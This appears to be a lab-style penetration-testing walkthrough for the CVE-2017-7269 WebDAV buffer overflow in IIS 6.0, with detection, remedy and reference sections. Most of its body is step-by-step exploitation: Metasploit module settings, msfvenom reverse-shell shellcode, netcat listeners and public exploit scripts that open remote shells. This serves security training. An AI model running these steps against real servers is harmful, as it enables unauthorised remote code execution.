Microsoft IIS is vulnerable to a buffer overflow, caused by improper bounds checking by the ScStoragePathFromUrl function in the WebDAV service. By sending an overly long header beginning with If: http:// in a PROPFIND request, a remote attacker could overflow a buffer and execute arbitrary code on the system.

Affected Products

Microsoft IIS 6.0

Detection

Nmap

  • nmap -T4 -p80 --script=http-iis-webdav-vuln 10.10.10.15

  • nmap --script http-webdav-scan -p80 10.10.10.14

Exploitation (Metasploit)

1. For this we will use the module (iis_webdav_scstoragepathfromurl)

  • search cve:2017-7269
  • use exploit/windows/iis/iis_webdav_scstoragepathfromurl
  • show options

2. Set the required options in this case

  • set RHOSTS 10.10.10.15
  • set RPORT 80
  • set LHOST 10.10.14.4
  • set LPORT 4444
  • run

3. Once, we get the connection back we can get out shell

  • shell

Note: You can use different payloads other than meterpreter, example windows/shell/reverse_tcp

1. Exploitation (Script)

There is another way to exploit this vulnerability using a custom script, I will use (https://github.com/danigargu/explodingcan)

1. Download the script from GitHub

  • git clone https://github.com/danigargu/explodingcan.git
  • cd explodingcan
  • ls

2. Using MSFVenom create a payload in shellcode, and save it to a file

  • msfvenom -p windows/shell_reverse_tcp -f raw -e x86/alpha_mixed LHOST=10.10.14.4 LPORT=4455 > shellcode_rev

3. Now start a netcat listener

  • nc -lvp 4455

4. Run the script and pass the reverse shellcode as argument

  • python explodingcan.py http://10.10.10.15 shellcode_rev

5. Now check the listener

2. Exploitation (Script)

There is another way to exploit this vulnerability using a custom script, I will use (https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269)

1. Download the script from GitHub

  • git clone https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269.git
  • cd iis6-exploit-2017-CVE-2017-7269
  • ls

2. Now start a netcat listener

  • nc -lvp 4455

3. Run the script and pass the arguments it needs, you can rename the script to add .py extension

  • python "iis6 reverse shell" 10.10.10.14 80 10.10.14.4 4455

4. Now check the listener, we should have a shell back

  • whoami

Remedy

Refer to Microsoft KB3197835 for patch, upgrade or suggested workaround information.

References

https://packetstormsecurity.com/files/142060

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269

https://bugtraq.securityfocus.com/archive

https://exchange.xforce.ibmcloud.com/vulnerabilities/123756

https://www.f5.com/labs/articles/threat-intelligence/windows-iis-60-cve-2017-7269-is-targeted-again-to-mine-electroneum

https://nvd.nist.gov/vuln/detail/CVE-2017-7269